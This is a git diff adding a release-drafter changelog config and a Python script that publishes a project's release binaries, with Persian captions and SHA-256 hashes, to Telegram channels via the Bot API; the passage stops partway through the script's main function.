diff --git a/.github/release-drafter.yml b/.github/release-drafter.yml
new file mode 100644
index 00000000..02b5753f
--- /dev/null
+++ b/.github/release-drafter.yml
@@ -0,0 +1,79 @@
+# release-drafter config — accumulates merged-PR titles into a draft GitHub
+# Release as PRs land on main, so the English half of docs/changelog/v<ver>.md
+# is prefilled by the time we cut the next release.
+#
+# How it fits with the existing release flow:
+#   - PRs merge → release-drafter updates the draft release tagged `next`
+#   - When ready to ship, run `prepare-release.yml` which reads the draft
+#     body and writes it into `docs/changelog/v<ver>.md` as a stub
+#   - You translate the bullets into Persian above the `---` separator,
+#     merge the prep PR, push the `v<ver>` tag, and release.yml takes over
+#
+# The draft is tagged `next` (not `vX.Y.Z`) so it never collides with the
+# real release-tag namespace. softprops/action-gh-release in release.yml
+# will create a fresh release for the actual `vX.Y.Z` tag — the `next`
+# draft just gets reset by release-drafter on the following PR merge.
+
+name-template: 'Next release (draft)'
+tag-template: 'next'
+
+# Flat bullet template — one line per merged PR, matching the existing
+# docs/changelog/v<ver>.md style:
+#
+#   • <verb-first headline> ([#NN](url)): <full explanation>. Thanks @user
+#
+# We bake the `: <expand>. Thanks @AUTHOR` suffix directly into the
+# template so the maintainer's job is just (a) strip the leading
+# `feat:`/`fix:` Conventional-Commit prefix that PR titles in this repo
+# carry (prepare-release.yml does this automatically with a sed pass),
+# (b) fix the verb tense if needed (`added` → `Add`), and (c) replace
+# `<expand>` with the explanatory clause.
+#
+# Why the placeholder is part of the template and not added later:
+# putting it here means the no-changes-template fallback (below) does
+# *not* get a `<expand>` suffix — only real PR-derived bullets do.
+change-template: '• $TITLE ([#$NUMBER]($URL)): <expand>. Thanks @$AUTHOR'
+change-title-escapes: '\<*_&'
+
+# Fallback if no PRs have merged since the last draft reset. Rare in
+# practice; here as a safety net so the draft body is never empty.
+# Deliberately doesn't follow the `<expand>`-bullet shape so it's
+# obviously a placeholder line, not a real release entry.
+no-changes-template: '_(no PR-tracked changes since the last release)_'
+
+# Skip PRs labelled `release-prep` from the changelog — those are the
+# automated version-bump PRs opened by prepare-release.yml; including
+# them would echo "release: prepare v1.6.6" into the next release notes.
+exclude-labels:
+  - 'release-prep'
+  - 'skip-changelog'
+
+# Auto-apply labels based on Conventional Commit title prefixes. The repo
+# already enforces feat:/fix:/etc. on PR titles, so this is "free" — no
+# contributor action needed. Labels feed the exclude-labels above and
+# also unlock PR filtering on the GitHub issues page if we want it later.
+autolabeler:
+  - label: 'release-prep'
+    title:
+      - '/^release:/i'
+  - label: 'type: feature'
+    title:
+      - '/^feat(\(.+\))?:/i'
+  - label: 'type: fix'
+    title:
+      - '/^fix(\(.+\))?:/i'
+  - label: 'type: chore'
+    title:
+      - '/^chore(\(.+\))?:/i'
+  - label: 'type: docs'
+    title:
+      - '/^docs?(\(.+\))?:/i'
+  - label: 'type: refactor'
+    title:
+      - '/^refactor(\(.+\))?:/i'
+
+# Body of the draft release: just the flat bullet list. No "What's
+# Changed" header, no contributors block — keep it copy-paste-ready
+# into docs/changelog/v<ver>.md.
+template: |
+  $CHANGES
diff --git a/.github/scripts/telegram_publish_files.py b/.github/scripts/telegram_publish_files.py
new file mode 100644
index 00000000..3f64cc07
--- /dev/null
+++ b/.github/scripts/telegram_publish_files.py
@@ -0,0 +1,806 @@
+#!/usr/bin/env python3
+"""Post each release artifact individually to a Telegram channel.
+
+Used by .github/workflows/telegram-publish-files.yml. Reads files from
+--assets-dir, picks a Persian caption per filename, posts via the
+Telegram Bot API `sendDocument` endpoint with --hashtag appended.
+
+Files larger than the Telegram Bot API's 50 MB ceiling are split into
+~45 MB byte chunks via Python (no `split` shell dep) and posted as
+`<name>.part_aa`, `.part_ab`, ... — recipients reassemble with
+`cat <name>.part_* > <name>`.
+
+Re-runnable: posts every file every time. Use carefully when re-running
+for the same version (the channel will get duplicate posts).
+"""
+
+from __future__ import annotations
+
+import argparse
+import hashlib
+import os
+import re
+import sys
+import time
+import urllib.error
+import urllib.parse
+import urllib.request
+import json
+from pathlib import Path
+
+# Telegram sendMessage caps at 4096 chars total. Leave headroom for
+# the announcement header / cross-link footer / hashtag — anything
+# above this gets truncated with a "see full notes on GitHub" tail.
+TG_CHANGELOG_BUDGET = 3500
+
+# Telegram Bot API uploads cap at 50 MB. Pick 45 MB for chunks so the
+# multipart envelope + caption + Telegram's own overhead don't push us
+# over. Bigger chunks (e.g. 49 MB) sometimes hit "Request Entity Too
+# Large" depending on caption length.
+CHUNK_LIMIT_BYTES = 45 * 1024 * 1024
+
+# Sleep between uploads. Telegram's documented rate limit is 1 msg/sec
+# to the same chat, plus a soft "burst" allowance. 1.5s is conservative
+# and means a 20-file release publishes in ~30 s.
+INTER_UPLOAD_SLEEP_SECS = 1.5
+
+# Filename-substring → Persian caption. Order matters: longest /
+# most-specific patterns first, since a shorter pattern (e.g.
+# "android-x86") can match a more-specific filename ("android-x86_64").
+# Match is `pattern in filename`.
+CAPTIONS: list[tuple[str, str]] = [
+    # Android — universal first (the recommended default for non-technical users).
+    ("android-universal", "نسخه اندروید (universal) — برای همه دستگاه‌ها"),
+    ("android-arm64-v8a", "نسخه اندروید (arm64-v8a) — گوشی‌های مدرن ۶۴ بیتی"),
+    ("android-armeabi-v7a", "نسخه اندروید (armv7) — گوشی‌های قدیمی‌تر ۳۲ بیتی"),
+    ("android-x86_64", "نسخه اندروید (x86_64) — شبیه‌ساز ۶۴ بیتی"),
+    ("android-x86", "نسخه اندروید (x86) — شبیه‌ساز"),
+    # Windows.
+    ("windows-amd64", "نسخه ویندوز x64 (۶۴ بیتی)"),
+    ("windows-i686", "نسخه ویندوز x86 (۳۲ بیتی، Win7+)"),
+    # macOS — .app bundles before plain CLI tarballs.
+    ("macos-arm64-app", "نسخه macOS (Apple Silicon) — برنامه گرافیکی .app"),
+    ("macos-amd64-app", "نسخه macOS (Intel) — برنامه گرافیکی .app"),
+    ("macos-arm64", "نسخه macOS (Apple Silicon) — CLI"),
+    ("macos-amd64", "نسخه macOS (Intel) — CLI"),
+    # Linux — musl static first, glibc second.
+    ("linux-musl-amd64", "نسخه لینوکس amd64 (musl static) — Alpine / OpenWRT-x86"),
+    ("linux-musl-arm64", "نسخه لینوکس arm64 (musl static)"),
+    ("linux-amd64", "نسخه لینوکس amd64 (glibc)"),
+    ("linux-arm64", "نسخه لینوکس arm64 (glibc)"),
+    # Embedded targets.
+    ("openwrt-mipsel-softfloat", "نسخه OpenWRT (mipsel softfloat) — روتر MT7621"),
+    ("raspbian-armhf", "نسخه Raspbian (armhf) — رزبری پای ۳۲ بیتی"),
+]
+
+
+def caption_for(filename: str) -> str:
+    """Return the Persian caption for a filename, falling back to the
+    bare filename if nothing matches."""
+    for pattern, persian in CAPTIONS:
+        if pattern in filename:
+            return persian
+    return f"نسخه `{filename}`"
+
+
+def order_files(files: list[Path]) -> list[Path]:
+    """Sort release files in CAPTIONS order (Android first, then
+    Windows, macOS, Linux, embedded). Files not matching any pattern
+    fall to the end in alphabetical order."""
+    order_map: dict[str, int] = {pattern: idx for idx, (pattern, _) in enumerate(CAPTIONS)}
+
+    def key(p: Path) -> tuple[int, str]:
+        for pattern, idx in order_map.items():
+            if pattern in p.name:
+                return (idx, p.name)
+        # Unknown patterns: push to end, alphabetize among themselves.
+        return (len(CAPTIONS), p.name)
+
+    return sorted(files, key=key)
+
+
+def split_file(path: Path, chunk_bytes: int) -> list[Path]:
+    """Split `path` into chunks of at most `chunk_bytes` bytes. Returns
+    the list of chunk paths, named `<orig>.part_aa`, `.part_ab`, ...
+    Mimics `split -b <chunk_bytes>`. Reassembled via
+    `cat <name>.part_* > <name>`.
+
+    Skips work if existing parts are already present (idempotent re-run)."""
+    parts: list[Path] = []
+
+    def part_name(idx: int) -> str:
+        # 26-letter base: aa..az, ba..bz, ... mirroring split's default.
+        first = chr(ord("a") + idx // 26)
+        second = chr(ord("a") + idx % 26)
+        return f"{path.name}.part_{first}{second}"
+
+    idx = 0
+    with path.open("rb") as src:
+        while True:
+            buf = src.read(chunk_bytes)
+            if not buf:
+                break
+            part_path = path.parent / part_name(idx)
+            with part_path.open("wb") as dst:
+                dst.write(buf)
+            parts.append(part_path)
+            idx += 1
+    return parts
+
+
+def send_document(
+    bot_token: str,
+    chat_id: str,
+    file_path: Path,
+    caption: str,
+) -> dict:
+    """POST a single file via the Telegram Bot API sendDocument endpoint.
+    Returns the parsed JSON response. Raises on HTTP error.
+
+    Uses urllib + a hand-rolled multipart/form-data encoder so we don't
+    pull `requests` (the workflow runs on stock GitHub-hosted runners
+    where stdlib-only is preferable for cold-start speed)."""
+    url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
+    boundary = "----mhrvUploadBoundary" + str(int(time.time() * 1000))
+    body = build_multipart(
+        boundary,
+        fields={
+            "chat_id": chat_id,
+            "caption": caption,
+            "parse_mode": "HTML",
+            # Disable preview to keep the channel tidy.
+            "disable_notification": "false",
+        },
+        files={"document": (file_path.name, file_path.read_bytes(), "application/octet-stream")},
+    )
+    req = urllib.request.Request(
+        url,
+        data=body,
+        headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
+        method="POST",
+    )
+    # 5 minute timeout for the actual upload — Telegram occasionally
+    # takes a while to process 40+ MB documents.
+    with urllib.request.urlopen(req, timeout=300) as resp:
+        return json.loads(resp.read().decode("utf-8"))
+
+
+def build_multipart(
+    boundary: str,
+    fields: dict[str, str],
+    files: dict[str, tuple[str, bytes, str]],
+) -> bytes:
+    """Build a multipart/form-data body. `files` is name → (filename,
+    bytes, mime). Plain stdlib so we don't need `requests`."""
+    parts: list[bytes] = []
+    crlf = b"\r\n"
+    bnd = f"--{boundary}".encode()
+
+    for name, value in fields.items():
+        parts.append(bnd)
+        parts.append(f'Content-Disposition: form-data; name="{name}"'.encode())
+        parts.append(b"")
+        parts.append(value.encode("utf-8"))
+
+    for name, (filename, data, mime) in files.items():
+        parts.append(bnd)
+        parts.append(
+            f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode()
+        )
+        parts.append(f"Content-Type: {mime}".encode())
+        parts.append(b"")
+        parts.append(data)
+
+    parts.append(f"--{boundary}--".encode())
+    parts.append(b"")
+    return crlf.join(parts)
+
+
+def html_escape(s: str) -> str:
+    return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
+
+
+def load_changelog(repo_root: Path, version: str) -> tuple[str | None, str | None]:
+    """Read `docs/changelog/v{version}.md` and split into (Persian, English).
+
+    The repo convention (see `docs/changelog/v1.1.0.md`) is:
+        <!-- comment line -->
+        Persian content...
+        ---
+        English content...
+
+    Returns (None, None) if the file doesn't exist (lets callers fall back
+    to the bare "release dropped" announcement gracefully). Returns
+    (persian, None) if there's no `---` separator (single-language file).
+    """
+    path = repo_root / "docs" / "changelog" / f"v{version}.md"
+    if not path.is_file():
+        return None, None
+    text = path.read_text(encoding="utf-8")
+    # Strip leading HTML comments (the standard `<!-- see docs/... -->`
+    # header). Their content is for editors, not readers.
+    text = re.sub(r"^\s*<!--.*?-->\s*", "", text, count=1, flags=re.DOTALL)
+    # Split on the literal `---` line that separates Persian from English.
+    # We require it to be on its own line so an inline `---` inside a code
+    # block doesn't accidentally split the body.
+    parts = re.split(r"\n\s*---\s*\n", text, maxsplit=1)
+    persian = parts[0].strip() or None
+    english = parts[1].strip() if len(parts) > 1 else None
+    if english:
+        english = english.strip() or None
+    return persian, english
+
+
+def brief_changelog(text: str, max_total: int = 1500) -> str:
+    """Compress a changelog body to top-level bullets only, with each bullet
+    trimmed to a short readable headline.
+
+    Sub-bullets, prose explanations, contributor @-mentions, and embedded
+    "by @user with full root cause + fix" prefatory phrases are stripped.
+    Markdown link `[text](url)` becomes plain `text`, with the special case
+    of `[#nnn](url)` → `#nnn` (issue/PR number stays readable without the
+    visual clutter of the URL). The result still goes through
+    `md_to_tg_html` for backtick → <code> conversion.
+
+    Why bullets-only: Telegram channel readers want "what shipped" in a
+    glance, not the architectural detail that lives in the git log + the
+    full `docs/changelog/v*.md` file. The full English text is still in
+    the repo for archival.
+
+    `max_total` caps the assembled brief so the announcement stays well
+    under Telegram's 4096-char sendMessage budget after header / footer
+    chrome is added.
+    """
+    out: list[str] = []
+    total_len = 0
+
+    for raw in text.splitlines():
+        if not raw.startswith("• "):
+            continue
+        body = raw[2:].strip()
+
+        # Strip "by @user with full root cause + fix" / "from @user" /
+        # "by @user". The "with ..." clause after "by @user" runs to the
+        # next closing paren — greedy `[^)]*` is what consumes it
+        # cleanly. Without the greedy form, the trailing "with full
+        # root cause + fix" remained in the headline.
+        body = re.sub(r" by @[\w-]+(?: with [^)]*)?", "", body)
+        body = re.sub(r" from @[\w-]+", "", body)
+
+        # `(PR [#nnn](url))` → `(#nnn)` and bare `[#nnn](url)` → `#nnn`.
+        # Done before generic `[text](url)` so the issue-number form
+        # wins over the catch-all (which would expand the link text).
+        body = re.sub(r"PR \[#(\d+)\]\([^)]+\)", r"#\1", body)
+        body = re.sub(r"\[#(\d+)\]\([^)]+\)", r"#\1", body)
+        body = re.sub(r"\[([^\]]+)\]\([^)]+\)", r"\1", body)
+
+        # Cut at the first natural sentence boundary that isn't too
+        # early. ":" anchored to position ≥ 30 catches "Title: details"
+        # without truncating short headers like "Tests:" / "API:" /
+        # "Build:" that are themselves the headline. ". " catches the
+        # rest. " — " (em-dash with spaces) is our explicit "headline
+        # — body" form in the changelogs.
+        candidates = []
+        for sep, min_pos in ((":", 30), (". ", 5), (" — ", 5)):
+            idx = body.find(sep)
+            if idx >= min_pos and idx < 200:
+                candidates.append(idx)
+        if candidates:
+            body = body[: min(candidates)].rstrip()
+
+        # Hard cap at 200 chars so a single sentence-less bullet
+        # (e.g. comma-separated list) can't dominate the brief.
+        if len(body) > 200:
+            body = body[:197].rstrip() + "…"
+
+        # If our truncation left an unclosed `(`, strip from there. A
+        # dangling `(` reads as a typo in the channel post; better to
+        # drop the parenthesised aside than to show a half-open one.
+        # Same for `[`. Counts compare: if open > close, find the last
+        # offending char and trim back to the previous space.
+        for open_ch, close_ch in (("(", ")"), ("[", "]")):
+            if body.count(open_ch) > body.count(close_ch):
+                last = body.rfind(open_ch)
+                if last > 0:
+                    body = body[:last].rstrip()
+
+        line = f"• {body}"
+        # +1 for the line separator we'll insert when joining.
+        if total_len + len(line) + 1 > max_total:
+            break
+        out.append(line)
+        total_len += len(line) + 1
+
+    return "\n".join(out)
+
+
+def md_to_tg_html(md: str, max_len: int = TG_CHANGELOG_BUDGET) -> str:
+    """Convert a subset of Markdown to Telegram-flavoured HTML.
+
+    Handles only the patterns that show up in our changelog files:
+      - `**bold**`            → `<b>bold</b>`
+      - `[text](url)`         → `<a href="url">text</a>`
+      - `` `code` ``          → `<code>code</code>`
+      - `<!-- comment -->`    → stripped
+      - everything else       → HTML-escaped, line breaks preserved
+
+    The order of operations matters because the input is going through
+    HTML escape: we first carve out the markdown spans into placeholders
+    that escape() can't touch, then escape the rest, then put the spans
+    back as Telegram HTML. This is the same trick the Python `markdown`
+    package uses for inline tokens — much simpler than a real parser
+    when the input grammar is tiny.
+
+    The result is also truncated at `max_len` chars (Telegram's 4096-char
+    sendMessage limit minus header/footer headroom). Truncation snaps to
+    the previous newline so we never cut a markdown span in half.
+    """
+    # 1. Strip HTML comments, including multi-line.
+    md = re.sub(r"<!--.*?-->", "", md, flags=re.DOTALL).strip()
+
+    # 2. Carve out the markdown spans into placeholder tokens. We pick a
+    #    NUL-delimited form because NUL is illegal in markdown source and
+    #    in Telegram messages — safe placeholder.
+    spans: list[str] = []
+
+    def stash(html: str) -> str:
+        spans.append(html)
+        return f"\x00{len(spans) - 1}\x00"
+
+    # Inline code first — backticks are exclusive of the other patterns.
+    md = re.sub(
+        r"`([^`\n]+)`",
+        lambda m: stash(f"<code>{html_escape(m.group(1))}</code>"),
+        md,
+    )
+    # Markdown links `[text](url)` — link text gets HTML-escaped, URL is
+    # passed through but quotes inside it would break the attribute, so
+    # we escape `"` only there.
+    md = re.sub(
+        r"\[([^\]]+)\]\(([^)]+)\)",
+        lambda m: stash(
+            f'<a href="{m.group(2).replace(chr(34), "&quot;")}">'
+            f"{html_escape(m.group(1))}</a>"
+        ),
+        md,
+    )
+    # Bold `**text**`. Done after links so a `**[text](url)**` pattern
+    # still works (the link is already a placeholder by now).
+    md = re.sub(
+        r"\*\*([^*\n]+)\*\*",
+        lambda m: stash(f"<b>{html_escape(m.group(1))}</b>"),
+        md,
+    )
+
+    # 3. HTML-escape everything that wasn't a span. Placeholders survive
+    #    because they contain only NUL and digits, which the escape pass
+    #    leaves alone.
+    md = html_escape(md)
+
+    # 4. Restore the placeholders. We loop because a placeholder's
+    #    expansion can itself contain placeholders — e.g. a markdown
+    #    link `[`code`](url)` stashes the inline code first, then the
+    #    link captures the code's `\x00N\x00` token as its link text.
+    #    A single pass would leave that inner token un-restored. Bound
+    #    the loop to len(spans)+1 so a malformed input can't run away.
+    for _ in range(len(spans) + 1):
+        new = re.sub(
+            r"\x00(\d+)\x00",
+            lambda m: spans[int(m.group(1))],
+            md,
+        )
+        if new == md:
+            break
+        md = new
+
+    # 5. Truncate to fit Telegram's sendMessage cap. Snap to a newline
+    #    boundary so a code/link span isn't cut in half. The trailing
+    #    "..." line tells the reader to go to GitHub for the full notes.
+    if len(md) > max_len:
+        cut = md.rfind("\n", 0, max_len)
+        if cut < max_len // 2:
+            cut = max_len  # very long single line — chop hard
+        md = md[:cut].rstrip() + "\n…\n<i>(see full notes on GitHub)</i>"
+    return md
+
+
+def repo_root_from_script() -> Path:
+    """Find the repo root from this script's location: `<root>/.github/
+    scripts/telegram_publish_files.py` → `<root>`. Used by `load_changelog`
+    so callers don't have to pass it in (and so the script Just Works
+    when run from `cwd != repo root`)."""
+    return Path(__file__).resolve().parent.parent.parent
+
+
+def sha256_hex(path: Path) -> str:
+    """Stream-hash the file in 1 MiB chunks. Avoids loading 40+ MB APKs
+    into RAM twice (once for hashing, once for upload)."""
+    h = hashlib.sha256()
+    with path.open("rb") as f:
+        for chunk in iter(lambda: f.read(1 << 20), b""):
+            h.update(chunk)
+    return h.hexdigest()
+
+
+def post_file(
+    bot_token: str,
+    chat_id: str,
+    file_path: Path,
+    base_caption: str,
+    hashtag: str,
+) -> bool:
+    """Post one file. If too big, split + post each part. Returns True
+    on success of all parts, False on any failure.
+
+    Each caption ends with the file's SHA-256 in hex under a Persian
+    "تایید اصالت" (authenticity verification) label, so recipients can
+    `sha256sum <file>` after download and confirm it matches what the
+    channel posted — defends against modified copies if the channel is
+    ever compromised or relayed through a third party."""
+    size = file_path.stat().st_size
+
+    # Compute the original-file hash regardless of whether we'll chunk
+    # it. For chunked uploads, every part's caption shows this hash so
+    # the user can verify the full file once reassembled with `cat`.
+    print(f"  hashing {file_path.name}...", flush=True)
+    full_sha = sha256_hex(file_path)
+
+    if size <= CHUNK_LIMIT_BYTES:
+        caption = (
+            f"<b>{html_escape(base_caption)}</b>\n"
+            f"<code>{html_escape(file_path.name)}</code>\n"
+            f"\nتایید اصالت (SHA-256):\n"
+            f"<code>{full_sha}</code>\n"
+            f"\n{hashtag}"
+        )
+        print(f"  uploading {file_path.name} ({size / 1_048_576:.1f} MB)...", flush=True)
+        try:
+            resp = send_document(bot_token, chat_id, file_path, caption)
+            if not resp.get("ok"):
+                print(f"    !! Telegram returned not-ok: {resp}", flush=True)
+                return False
+            print(f"    ok (message_id={resp['result']['message_id']})", flush=True)
+            return True
+        except urllib.error.HTTPError as e:
+            err_body = e.read().decode("utf-8", errors="replace")[:500]
+            print(f"    !! HTTP {e.code}: {err_body}", flush=True)
+            return False
+        except Exception as e:
+            print(f"    !! exception: {e}", flush=True)
+            return False
+        finally:
+            time.sleep(INTER_UPLOAD_SLEEP_SECS)
+
+    # Too big — split and post each part.
+    print(
+        f"  splitting {file_path.name} ({size / 1_048_576:.1f} MB > "
+        f"{CHUNK_LIMIT_BYTES / 1_048_576:.0f} MB ceiling)...",
+        flush=True,
+    )
+    parts = split_file(file_path, CHUNK_LIMIT_BYTES)
+    if not parts:
+        print(f"    !! split produced 0 parts (empty file?)", flush=True)
+        return False
+
+    n = len(parts)
+    all_ok = True
+    for idx, part_path in enumerate(parts, start=1):
+        # Hash the individual part too — lets the user verify each
+        # downloaded chunk before bothering to reassemble.
+        part_sha = sha256_hex(part_path)
+        part_caption = (
+            f"<b>{html_escape(base_caption)} — قسمت {idx}/{n}</b>\n"
+            f"<code>{html_escape(part_path.name)}</code>\n"
+            f"\nبرای بازسازی فایل اصلی:\n"
+            f"<code>cat {html_escape(file_path.name)}.part_* &gt; "
+            f"{html_escape(file_path.name)}</code>\n"
+            f"\nتایید اصالت این قسمت (SHA-256):\n"
+            f"<code>{part_sha}</code>\n"
+            f"\nتایید اصالت فایل کامل پس از بازسازی (SHA-256):\n"
+            f"<code>{full_sha}</code>\n"
+            f"\n{hashtag}"
+        )
+        psize = part_path.stat().st_size
+        print(
+            f"    uploading part {idx}/{n}: {part_path.name} ({psize / 1_048_576:.1f} MB)...",
+            flush=True,
+        )
+        try:
+            resp = send_document(bot_token, chat_id, part_path, part_caption)
+            if not resp.get("ok"):
+                print(f"      !! Telegram returned not-ok: {resp}", flush=True)
+                all_ok = False
+            else:
+                print(
+                    f"      ok (message_id={resp['result']['message_id']})", flush=True
+                )
+        except urllib.error.HTTPError as e:
+            err_body = e.read().decode("utf-8", errors="replace")[:500]
+            print(f"      !! HTTP {e.code}: {err_body}", flush=True)
+            all_ok = False
+        except Exception as e:
+            print(f"      !! exception: {e}", flush=True)
+            all_ok = False
+        finally:
+            time.sleep(INTER_UPLOAD_SLEEP_SECS)
+            # Tidy up the part file once posted.
+            try:
+                part_path.unlink()
+            except OSError:
+                pass
+
+    return all_ok
+
+
+def files_channel_post_link(chat_id: str, message_id: int) -> str:
+    """Build a `t.me` link to a specific message in the files channel.
+
+    For private supergroups/channels (negative ID with `-100` prefix),
+    Telegram exposes posts at `https://t.me/c/<id>/<msg>` where `<id>`
+    is the chat ID with the `-100` stripped. This link works for users
+    who are members of the channel.
+
+    If `FILES_CHANNEL_USERNAME` is set in env (e.g. `mhrv_files`), uses
+    the public-channel form `https://t.me/<username>/<msg>` instead,
+    which is clickable for everyone."""
+    username = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@")
+    if username:
+        return f"https://t.me/{username}/{message_id}"
+    cid = chat_id
+    if cid.startswith("-100"):
+        cid = cid[4:]
+    elif cid.startswith("-"):
+        cid = cid[1:]
+    return f"https://t.me/c/{cid}/{message_id}"
+
+
+def post_main_channel_pointer(
+    bot_token: str,
+    main_chat_id: str,
+    files_channel_post_link: str,
+    version: str,
+    hashtag: str,
+    channel_username_link: str = "",
+    channel_invite_link: str = "",
+    english_notes_brief: str | None = None,
+) -> bool:
+    """Post a short cross-link to the main announcement channel pointing
+    at the anchor post in the files channel. Replaces the previous
+    behaviour of posting the universal APK + full changelog directly
+    to the main channel — the main channel becomes a discovery surface
+    while the files channel hosts the actual artifacts.
+
+    When `english_notes_brief` is supplied (the brief-extracted English
+    half of `docs/changelog/v{version}.md` via `brief_changelog`), it's
+    rendered between the title and the files-channel link so subscribers
+    see what's new without clicking through. Falls back to the bare
+    pointer if notes aren't available.
+
+    English brief (not Persian full) is what we ship to TG: the audience
+    is the worldwide channel, and short brief-tone bullets read cleanly
+    in a chat client where Persian RTL prose mixed with `<code>` /
+    `<b>` spans rendered awkwardly. The full Persian + full English
+    changelog stays in `docs/changelog/v*.md` for archival.
+
+    Includes channel-join links (public username + invite hash) at the
+    bottom so recipients who aren't yet members can subscribe before
+    clicking through to the specific release post.
+    """
+    parts = [
+        f"<b>📦 mhrv-rs v{html_escape(version)} released</b>",
+        "",
+    ]
+    if english_notes_brief:
+        # Tighter budget than the files-channel announcement since the
+        # cross-link has extra footer chrome (channel-join links).
+        parts.append(md_to_tg_html(english_notes_brief, max_len=TG_CHANGELOG_BUDGET - 400))
+        parts.append("")
+    parts.extend([
+        f"Files (Android APKs, Windows, macOS, Linux, OpenWRT) on the files channel:",
+        "",
+        f"👉 <a href=\"{html_escape(files_channel_post_link)}\">"
+        f"v{html_escape(version)} — all files with SHA-256</a>",
+    ])
+    # Channel-join links. Two forms handle different states of the
+    # files channel: the `t.me/<username>` form works for public
+    # channels and is the prettier link; the `t.me/+<hash>` invite
+    # link works regardless of whether the channel is public, and is
+    # the only path in for private/restricted channels. Showing both
+    # is forgiving — recipients click whichever works for them.
+    if channel_username_link or channel_invite_link:
+        parts.append("")
+        parts.append("Channel:")
+        if channel_username_link:
+            # Render as plain URL (not HTML <a>) so the text shows the
+            # link itself — useful when users share the message via
+            # screenshot or copy-paste outside Telegram, which would
+            # strip the <a href> wrapper.
+            parts.append(html_escape(channel_username_link))
+        if channel_invite_link:
+            parts.append(f"or: {html_escape(channel_invite_link)}")
+    parts.append("")
+    parts.append(hashtag)
+    text = "\n".join(parts)
+    url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
+    data = urllib.parse.urlencode({
+        "chat_id": main_chat_id,
+        "text": text,
+        "parse_mode": "HTML",
+        "disable_web_page_preview": "false",
+    }).encode()
+    print(f"  posting cross-link to main channel {main_chat_id}...", flush=True)
+    try:
+        with urllib.request.urlopen(
+            urllib.request.Request(url, data=data, method="POST"), timeout=30
+        ) as resp:
+            r = json.loads(resp.read().decode("utf-8"))
+            if not r.get("ok"):
+                print(f"    !! main-channel post failed: {r}", flush=True)
+                return False
+            print(
+                f"    ok (message_id={r['result']['message_id']})", flush=True
+            )
+            return True
+    except urllib.error.HTTPError as e:
+        err_body = e.read().decode("utf-8", errors="replace")[:500]
+        print(f"    !! HTTP {e.code}: {err_body}", flush=True)
+        return False
+    except Exception as e:
+        print(f"    !! exception: {e}", flush=True)
+        return False
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--assets-dir", required=True, type=Path)
+    parser.add_argument("--version", required=True, help="e.g. 1.8.0")
+    parser.add_argument("--hashtag", required=True, help="e.g. #v180")
+    args = parser.parse_args()
+
+    bot_token = os.environ.get("BOT_TOKEN")
+    chat_id = os.environ.get("CHAT_ID")
+    if not bot_token or not chat_id:
+        print("BOT_TOKEN and CHAT_ID env vars required", file=sys.stderr)
+        return 2
+
+    if not args.assets_dir.is_dir():
+        print(f"--assets-dir {args.assets_dir} not a directory", file=sys.stderr)
+        return 2
+
+    # Collect all regular files in the directory (no recursion). Skip
+    # split-part leftovers from a previous run of this script if any
+    # exist — we'll regenerate cleanly.
+    raw_files = [
+        p for p in args.assets_dir.iterdir()
+        if p.is_file() and ".part_" not in p.name
+    ]
+    if not raw_files:
+        print(f"no files found in {args.assets_dir}", file=sys.stderr)
+        return 2
+
+    files = order_files(raw_files)
+    print(f"publishing {len(files)} file(s) to Telegram chat {chat_id} for v{args.version}:")
+    for f in files:
+        print(f"  - {f.name}")
+    print()
+
+    # Leading announcement in the files channel. Captured `message_id`
+    # is the anchor that the main-channel cross-link points at — the
+    # main channel doesn't carry files anymore, just a single message
+    # saying "new release, click here." Recipients land on this anchor
+    # and scroll down to see all the platform-specific files.
+    #
+    # We pull the English half of `docs/changelog/v{version}.md`, run it
+    # through `brief_changelog` to keep just the top-level bullets (no
+    # sub-bullets, no contributor mentions, no embedded prose), and
+    # inject that into the announcement. Brief English (not full Persian)
+    # is the right tone for a Telegram channel post: subscribers want
+    # "what shipped" in one glance; the full archival changelog stays in
+    # the repo. Falls back to the bare skeleton if the changelog file
+    # doesn't exist (e.g. an out-of-band re-publish for an old tag).
+    _persian_notes, english_notes = load_changelog(repo_root_from_script(), args.version)
+    english_brief = brief_changelog(english_notes) if english_notes else None
+    announce_lines = [
+        f"<b>📦 mhrv-rs {html_escape('v' + args.version)} released</b>",
+        "",
+    ]
+    if english_brief:
+        announce_lines.append(md_to_tg_html(english_brief))
+        announce_lines.append("")
+    announce_lines.extend([
+        "Per-platform files follow with SHA-256 captions for verification.",
+        "",
+        args.hashtag,
+    ])
+    announce = "\n".join(announce_lines)
+    announce_msg_id: int | None = None
+    try:
+        url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
+        data = urllib.parse.urlencode({
+            "chat_id": chat_id,
+            "text": announce,
+            "parse_mode": "HTML",
+            "disable_web_page_preview": "true",
+        }).encode()
+        with urllib.request.urlopen(
+            urllib.request.Request(url, data=data, method="POST"), timeout=30
+        ) as resp:
+            r = json.loads(resp.read().decode("utf-8"))
+            if not r.get("ok"):
+                print(f"  !! announcement failed: {r}", flush=True)
+            else:
+                announce_msg_id = r["result"]["message_id"]
+                print(
+                    f"  announcement posted (message_id={announce_msg_id})",
+                    flush=True,
+                )
+    except Exception as e:
+        # Non-fatal for the file uploads, but cross-link to the main
+        # channel below will be skipped — without the anchor message_id
+        # there's nothing to point at.
+        print(f"  !! announcement exception: {e}", flush=True)
+    time.sleep(INTER_UPLOAD_SLEEP_SECS)
+
+    failures = 0
+    for f in files:
+        base = caption_for(f.name)
+        ok = post_file(bot_token, chat_id, f, base, args.hashtag)
+        if not ok:
+            failures += 1
+
+    # Cross-link to the main announcement channel. Skipped if MAIN_CHAT_ID
+    # is unset (development / private testing) or if the files-channel
+    # announcement didn't post (no anchor to link to).
+    main_chat_id = os.environ.get("MAIN_CHAT_ID", "").strip()
+    if main_chat_id and announce_msg_id is not None:
+        link = files_channel_post_link(chat_id, announce_msg_id)
+        # Optional channel-join links rendered alongside the cross-link.
+        # `FILES_CHANNEL_USERNAME` is the public-username form (clean
+        # `t.me/<name>` URL — clickable for everyone). `FILES_CHANNEL_INVITE`
+        # is the `t.me/+<hash>` invite link, the only join path for
+        # private channels. Either or both can be set; both render in
+        # the body as separate lines.
+        username = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@")
